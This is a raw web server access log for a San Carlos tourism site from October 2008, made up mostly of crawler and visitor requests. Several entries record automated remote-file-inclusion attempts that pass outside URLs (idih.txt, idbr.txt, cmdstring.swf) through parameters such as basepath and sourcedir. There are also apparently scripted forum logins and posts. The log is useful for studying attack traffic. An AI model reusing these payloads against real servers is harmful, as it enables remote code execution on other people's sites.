66.225.214.207 - - [30/Oct/2008:05:21:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/idih.txt%0D? HTTP/1.1" 404 765 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:22:06 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.0" 200 24461 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:05:22:21 -0700] "GET /logs/access_080929.log/index.php?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:05:22:21 -0700] "GET /logs/index.php?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 763 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:05:22:21 -0700] "GET /index.php?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 758 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:05:22:21 -0700] "GET /logs/access_080917.log/index.php?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:05:22:24 -0700] "GET /logs/access_080929.log/index.php?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:05:22:24 -0700] "GET /logs/index.php?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 763 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:05:22:24 -0700] "GET /index.php?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 758 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:05:22:25 -0700] "GET /logs/access_080917.log/index.php?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:22:40 -0700] "GET /listings/listing/results.php?category_id=750 HTTP/1.1" 200 24165 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
82.99.30.41 - - [30/Oct/2008:05:22:47 -0700] "GET /jodera2/memberlist.php?sid=942e134f1d8ccf91bcdf36be23205dcc HTTP/1.0" 200 80951 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:22:52 -0700] "GET /listings/listing/results.php?category_id=755 HTTP/1.1" 200 24424 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:05:22:57 -0700] "GET /jodera2/posting.php?mode=reply&t=24060 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24060" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:05:22:57 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24060&sid=cf8428c1543b0b2853cb7633c2adb239 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24060&sid=cf8428c1543b0b2853cb7633c2adb239" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:05:22:58 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24060&sid=cf8428c1543b0b2853cb7633c2adb239" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:05:22:59 -0700] "GET /jodera2/posting.php?mode=reply&t=24060&sid=cf8428c1543b0b2853cb7633c2adb239 HTTP/1.0" 200 50509 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24060&sid=cf8428c1543b0b2853cb7633c2adb239" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:23:01 -0700] "GET /listings/listing/results.php?category_id=748 HTTP/1.1" 200 26606 "http://www.sancarloscity.org/listings/listing/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.225.214.207 - - [30/Oct/2008:05:23:06 -0700] "GET /logs/access_081007.log//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/idih.txt%0D? HTTP/1.1" 404 789 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:05:23:11 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24060&sid=cf8428c1543b0b2853cb7633c2adb239" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
89.149.196.210 - - [30/Oct/2008:05:23:12 -0700] "GET /jodera2/viewtopic.php?p=29884#29884 HTTP/1.0" 200 82749 "http://www.sancarloscity.org/viewtopic.php?p=29884#29884" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:05:23:15 -0700] "GET /jodera2/posting.php?mode=reply&t=24064 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24064" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:05:23:16 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24064&sid=58048def3cf4ba1d016b38b1d0b7f2ed HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24064&sid=58048def3cf4ba1d016b38b1d0b7f2ed" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:05:23:16 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24064&sid=58048def3cf4ba1d016b38b1d0b7f2ed" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:05:23:17 -0700] "GET /jodera2/posting.php?mode=reply&t=24064&sid=58048def3cf4ba1d016b38b1d0b7f2ed HTTP/1.0" 200 50393 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24064&sid=58048def3cf4ba1d016b38b1d0b7f2ed" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:23:20 -0700] "GET /aboutus.htm HTTP/1.1" 200 20766 "http://www.sancarloscity.org/advertise" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:23:25 -0700] "GET /index1.htm HTTP/1.1" 200 21792 "http://www.sancarloscity.org/advertise" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:23:30 -0700] "GET /hotelrates.htm HTTP/1.1" 200 26015 "http://www.sancarloscity.org/advertise" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:23:32 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:05:23:33 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24064&sid=58048def3cf4ba1d016b38b1d0b7f2ed" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
89.149.227.208 - - [30/Oct/2008:05:23:34 -0700] "GET /jodera2/viewtopic.php?p=29885#29885 HTTP/1.0" 200 81486 "http://www.sancarloscity.org/viewtopic.php?p=29885#29885" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:23:38 -0700] "GET /gettingtosancarlos.htm HTTP/1.1" 200 32255 "http://www.sancarloscity.org/advertise" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:23:40 -0700] "GET /attractions.htm HTTP/1.1" 200 20789 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:23:43 -0700] "GET /listings/listing/detail.php?id=14829 HTTP/1.1" 200 36940 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:23:45 -0700] "GET /hotelrates.htm HTTP/1.1" 200 26015 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:23:47 -0700] "GET /gettingtosancarlos.htm HTTP/1.1" 200 32255 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:23:47 -0700] "GET /newmaps/mappage.htm HTTP/1.1" 200 5346 "http://www.sancarloscity.org/advertise" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:23:50 -0700] "GET /gettingaround.htm HTTP/1.1" 200 20762 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:23:50 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:23:53 -0700] "GET /listings/promotion/ HTTP/1.1" 200 16115 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:23:56 -0700] "GET /listings/listing/results.php?category_id=692 HTTP/1.1" 200 40191 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:23:58 -0700] "GET /listings/listing/results.php?category_id=746 HTTP/1.1" 200 24376 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:01 -0700] "GET /listings/listing/results.php?category_id=751 HTTP/1.1" 200 37851 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:24:02 -0700] "GET /logs/access_080929.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:24:02 -0700] "GET /logs/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 200 71305 "-" "libwww-perl/5.810" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:02 -0700] "GET /forum/profile.php?mode=register HTTP/1.1" 404 766 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:05 -0700] "GET /aboutsancarlos.htm HTTP/1.1" 200 25459 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:08 -0700] "GET /listings/promotion/results.php?category_id=745 HTTP/1.1" 200 5213 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:24:09 -0700] "GET /logs/access_081009.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:11 -0700] "GET /listings/promotion/results.php?category_id=740 HTTP/1.1" 200 5199 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:24:11 -0700] "GET /logs/access_080822.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:24:11 -0700] "GET /listings/listing/results.php?letter=j&category_id=728 HTTP/1.1" 200 25097 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:24:11 -0700] "GET /logs/access_080917.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:13 -0700] "GET /listings/promotion/results.php?category_id=702 HTTP/1.1" 200 5195 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:15 -0700] "GET /listings/promotion/results.php?category_id=713 HTTP/1.1" 200 5221 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:18 -0700] "GET /listings/listing/results.php?category_id=699 HTTP/1.1" 200 31242 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:22 -0700] "GET /listings/listing/results.php?category_id=691 HTTP/1.1" 200 53084 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:23 -0700] "GET /listings/listing/results.php?category_id=750 HTTP/1.1" 200 24165 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:24:25 -0700] "GET /listings/listing/results.php?letter=k&category_id=697 HTTP/1.1" 200 25088 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:26 -0700] "GET /listings/favorites.php HTTP/1.1" 200 7957 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:29 -0700] "GET /listings/listing/results.php?category_id=747 HTTP/1.1" 200 26628 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:31 -0700] "GET /listings/listing/results.php?category_id=732 HTTP/1.1" 200 31141 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:24:31 -0700] "GET /logs/access_081015.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:34 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:37 -0700] "GET /listings/index.php HTTP/1.1" 200 11273 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:39 -0700] "GET /listings/listing/results.php?category_id=744 HTTP/1.1" 200 28921 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:41 -0700] "GET /listings/listing/results.php?category_id=758 HTTP/1.1" 200 24171 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:24:42 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61704 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:44 -0700] "GET /listings/listing/results.php?category_id=745 HTTP/1.1" 200 24346 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:46 -0700] "GET /listings/listing/results.php?category_id=753 HTTP/1.1" 200 24355 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:49 -0700] "GET /listings/listing/results.php?category_id=743 HTTP/1.1" 200 45246 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:51 -0700] "GET /listings/listing/results.php?category_id=694 HTTP/1.1" 200 26507 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:53 -0700] "GET /listings/listing/results.php?category_id=740 HTTP/1.1" 200 24337 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:24:56 -0700] "GET /listings/listing/results.php?category_id=757 HTTP/1.1" 200 24157 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:02 -0700] "GET /logs/access_080610.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:25:04 -0700] "GET /jodera2/viewforum.php?f=1&sid=246845299e16a5c5ff491bb51ca8c20c HTTP/1.0" 200 84795 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:25:04 -0700] "GET /listings/listing/results.php?category_id=748 HTTP/1.1" 200 26606 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:25:06 -0700] "GET /listings/members/ HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:25:08 -0700] "GET /listings/listing/results.php?category_id=739 HTTP/1.1" 200 24160 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
206.223.212.99 - - [30/Oct/2008:05:25:11 -0700] "GET /forum2/index.php?act=rssout&id=1 HTTP/1.1" 200 4131 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.sancarloscity.org"
193.47.80.36 - - [30/Oct/2008:05:25:12 -0700] "GET /listings/listing/results.php?category_id=712 HTTP/1.1" 200 45751 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:25:16 -0700] "GET /picgallery HTTP/1.1" 301 103 "http://www.sancarloscity.org/advertise" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:16 -0700] "GET /logs/access_080830.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:25:20 -0700] "GET /picgallery/ HTTP/1.1" 200 61442 "http://www.sancarloscity.org/advertise" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:25:29 -0700] "GET /index.htm HTTP/1.1" 200 44270 "http://www.sancarloscity.org/advertise" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:25:34 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:25:37 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:25:42 -0700] "GET /listings/order_banner.php?type=50 HTTP/1.1" 200 15257 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:25:44 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/event/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
203.209.240.146 - - [30/Oct/2008:05:25:46 -0700] "HEAD /sccinewsearch.jpg HTTP/1.1" 200 0 "-" "iearthworm/1.0, mailto:iearthworm@yahoo.com.cn" "sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:25:46 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61812 "-" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:25:47 -0700] "GET /picgallery/displayimage.php?album=18&pos=0 HTTP/1.0" 200 9976 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:05:25:49 -0700] "GET /jodera2/index.php?sid=246845299e16a5c5ff491bb51ca8c20c HTTP/1.0" 200 55147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:49 -0700] "GET /logs/access_080828.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:49 -0700] "GET /logs/access_081006.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:50 -0700] "GET /logs/access_081012.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:50 -0700] "GET /logs/access_080914.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:51 -0700] "GET /logs/access_080831.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:51 -0700] "GET /logs/access_081007.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:51 -0700] "GET /logs/access_080930.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:51 -0700] "GET /logs/access_080904.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:52 -0700] "GET /logs/access_080928.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:25:53 -0700] "GET /jodera2/viewforum.php?f=1&sid=3f9561836b8c08933018899c64da65d2 HTTP/1.0" 200 84795 "-" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:53 -0700] "GET /logs/access_081005.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.30.161.235 - - [30/Oct/2008:05:25:55 -0700] "GET /picgallery/thumbnails.php?album=lastcom&cat=-27 HTTP/1.0" 200 4075 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:56 -0700] "GET /logs/access_081017.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:25:57 -0700] "GET /logs/access_080907.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.30.161.235 - - [30/Oct/2008:05:25:57 -0700] "GET /listings/listing/results.php?letter=s&category_id=757 HTTP/1.0" 200 25063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.111.154.16 - - [30/Oct/2008:05:25:59 -0700] "GET /picgallery/thumbnails.php?album=11&page=1&sort=td HTTP/1.1" 200 16481 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
205.234.146.65 - - [30/Oct/2008:05:26:01 -0700] "GET /logs/access_080924.log/?sourcedir=http://www.tallgirls.co.uk/stats/cmdstring.swf? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:26:01 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "www.sancarloscity.org"
